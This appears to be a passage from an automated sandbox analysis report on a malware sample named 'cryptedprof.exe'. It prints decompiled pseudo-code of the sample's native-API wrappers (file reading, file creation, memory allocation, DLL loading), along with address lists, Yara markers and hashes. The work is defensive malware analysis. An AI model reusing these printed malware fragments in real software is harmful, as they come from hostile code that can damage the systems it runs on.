							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                        0x709910e7
                                                                                        0x709910ef
                                                                                        0x70991103
                                                                                        0x7099110b
                                                                                        0x70991116
                                                                                        0x70991119
                                                                                        0x70991121
                                                                                        0x70991124
                                                                                        0x70991126
                                                                                        0x709911c4
                                                                                        0x709911d0
                                                                                        0x7099112c
                                                                                        0x7099112d
                                                                                        0x7099112d
                                                                                        0x70991130
                                                                                        0x70991131
                                                                                        0x70991134
                                                                                        0x70991203
                                                                                        0x70991206
                                                                                        0x7099119e
                                                                                        0x709911a4
                                                                                        0x709911ac
                                                                                        0x709911b1
                                                                                        0x709911b4
                                                                                        0x00000000
                                                                                        0x709911b4
                                                                                        0x70991209
                                                                                        0x7099120a
                                                                                        0x70991186
                                                                                        0x7099118c
                                                                                        0x70991194
                                                                                        0x00000000
                                                                                        0x70991194
                                                                                        0x70991152
                                                                                        0x70991153
                                                                                        0x7099115b
                                                                                        0x70991168
                                                                                        0x70991170
                                                                                        0x70991179
                                                                                        0x7099117e
                                                                                        0x7099117e
                                                                                        0x00000000
                                                                                        0x70991153
                                                                                        0x7099113a
                                                                                        0x709911d1
                                                                                        0x709911d1
                                                                                        0x709911d8
                                                                                        0x709911e5
                                                                                        0x709911ea
                                                                                        0x709911ef
                                                                                        0x709911f5
                                                                                        0x709911fb
                                                                                        0x709911fb
                                                                                        0x00000000
                                                                                        0x709911d8
                                                                                        0x70991140
                                                                                        0x70991143
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991149
                                                                                        0x7099114c
                                                                                        0x7099119b
                                                                                        0x00000000
                                                                                        0x7099119b
                                                                                        0x7099114f
                                                                                        0x70991150
                                                                                        0x70991183
                                                                                        0x00000000
                                                                                        0x70991183
                                                                                        0x00000000
                                                                                        0x709911ba
                                                                                        0x709911ba
                                                                                        0x00000000
                                                                                        0x709911c3

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: 466ad06a39af8f611345a80cba98f82064dce1fa1f0a3aa83cbc933e12190184
                                                                                        • Instruction ID: e69b88a77a5ef1fa73add4f13f80b1a78c565b543557eaeb59def2cb11630eee
                                                                                        • Opcode Fuzzy Hash: 466ad06a39af8f611345a80cba98f82064dce1fa1f0a3aa83cbc933e12190184
                                                                                        • Instruction Fuzzy Hash: 6131AFB253C100EFD7229F66DD45F2D7FBCFBC5244B24412AFA46E6324D67498009B2A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                        0x00405d5b
                                                                                        0x00405d5d
                                                                                        0x00405d60
                                                                                        0x00405d8c
                                                                                        0x00405d65
                                                                                        0x00405d6e
                                                                                        0x00405d73
                                                                                        0x00405d7e
                                                                                        0x00405d81
                                                                                        0x00405d9d
                                                                                        0x00405d83
                                                                                        0x00405d8a
                                                                                        0x00000000
                                                                                        0x00405d8a
                                                                                        0x00405d96
                                                                                        0x00405d9a
                                                                                        0x00405d9a
                                                                                        0x00405d94
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                        • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                        • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                        • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                        • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Analysis Process: cryptedprof.exe PID: 7064 Parent PID: 6980 cryptedprof.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 00419DB4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: BMA$BMA
                                                                                        • API String ID: 2738559852-2163208940
                                                                                        • Opcode ID: e057cf46ccd3db2b722e5824745a7725a82f531d19f825803eea8a1e84552030
                                                                                        • Instruction ID: 4f69a3f11c1cce54d2c57a6e5244db96d48f95c1903781e266c5d2f7246d4c1c
                                                                                        • Opcode Fuzzy Hash: e057cf46ccd3db2b722e5824745a7725a82f531d19f825803eea8a1e84552030
                                                                                        • Instruction Fuzzy Hash: 59F0F4B2200108AFCB04CF99CC81EEB77A9EF8C314F168649BA0DA7241D634E8518BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 21%
                                                                                        			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}







                                                                                        0x00419e12
                                                                                        0x00419e13
                                                                                        0x00419e1f
                                                                                        0x00419e27
                                                                                        0x00419e32
                                                                                        0x00419e4d
                                                                                        0x00419e55
                                                                                        0x00419e59

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: BMA$BMA
                                                                                        • API String ID: 2738559852-2163208940
                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040ACD0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                        0x0040acec
                                                                                        0x0040acef
                                                                                        0x0040acf4
                                                                                        0x0040acf9
                                                                                        0x0040ad03
                                                                                        0x0040ad08
                                                                                        0x0040ad0b
                                                                                        0x0040ad0d
                                                                                        0x0040ad15
                                                                                        0x0040ad1a
                                                                                        0x0040ad1a
                                                                                        0x0040ad21
                                                                                        0x0040ad29
                                                                                        0x0040ad2c
                                                                                        0x0040ad2e
                                                                                        0x0040ad42
                                                                                        0x00000000
                                                                                        0x0040ad44
                                                                                        0x0040ad4a
                                                                                        0x0040acfe
                                                                                        0x0040acfe
                                                                                        0x0040acfe

                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                        • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                        • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: ed3890e6c2eee5cfa791458169c80ce269c18676380613ddf59191260504aa03
                                                                                        • Instruction ID: 58357fb814e1e4387aeab9ebf93d5a073099e80174bff116cacca3e8f16ab292
                                                                                        • Opcode Fuzzy Hash: ed3890e6c2eee5cfa791458169c80ce269c18676380613ddf59191260504aa03
                                                                                        • Instruction Fuzzy Hash: 5A0181B5200208AFCB10DF99DC81DEB77A9EF88314F15855AFD4C97242C234E9618BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E00419D5A(void* __eax, void* __ecx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t25;
				void* _t37;

				_pop(_t41);
				_push(cs);
				_t19 = _a4;
				_t4 = _t19 + 0xc40; // 0xc40
				E0041A960(_t37, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t25;
			}





                                                                                        0x00419d5a
                                                                                        0x00419d5c
                                                                                        0x00419d63
                                                                                        0x00419d6f
                                                                                        0x00419d77
                                                                                        0x00419dad
                                                                                        0x00419db1

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: f15d63ada20e0f20ceec27c84b0ed4a84692169150ddc62e2d63ddd8ca885570
                                                                                        • Instruction ID: 7a889a84d11053dc69158f2f0a2d7f67351ec2de8c74b34ac5053da27a58845f
                                                                                        • Opcode Fuzzy Hash: f15d63ada20e0f20ceec27c84b0ed4a84692169150ddc62e2d63ddd8ca885570
                                                                                        • Instruction Fuzzy Hash: 7101B2B2245108AFDB08CF89DC85EEB77A9EF8C754F158249FA0DD7241D630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                        0x00419d6f
                                                                                        0x00419d77
                                                                                        0x00419dad
                                                                                        0x00419db1

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419F3C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E00419F3C(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("repne or [ebp-0x75], edx");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E0041A960(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                                                        0x00419f3e
                                                                                        0x00419f43
                                                                                        0x00419f4f
                                                                                        0x00419f57
                                                                                        0x00419f79
                                                                                        0x00419f7d

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 588d42500eaa8f33a75c8037f2c558722823ec8540eb2e217d6509b3064446de
                                                                                        • Instruction ID: d757479f96a94d99c7df45af5541aad8b351257795a51d34ef1e2b312c60ea25
                                                                                        • Opcode Fuzzy Hash: 588d42500eaa8f33a75c8037f2c558722823ec8540eb2e217d6509b3064446de
                                                                                        • Instruction Fuzzy Hash: 36F0F8B1210208AFDB18DF99CC81EEB77A9EF88354F158559FA09A7251C630E911CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                        0x00419f4f
                                                                                        0x00419f57
                                                                                        0x00419f79
                                                                                        0x00419f7d

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                        • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                        • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                        0x00419e93
                                                                                        0x00419e96
                                                                                        0x00419e9f
                                                                                        0x00419ea7
                                                                                        0x00419eb5
                                                                                        0x00419eb9

                                                                                        APIs
                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                                        • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                                                                                        • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                                        • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                                        • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                                                                                        • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                                        • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                                        • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                                                                                        • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                                        • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                                        • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                                                                                        • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                                        • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                                        • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                                                                                        • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                                        • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                                        • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                                                                                        • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                                        • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                                        • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                                                                                        • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                                        • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                                                                                        Uniqueness

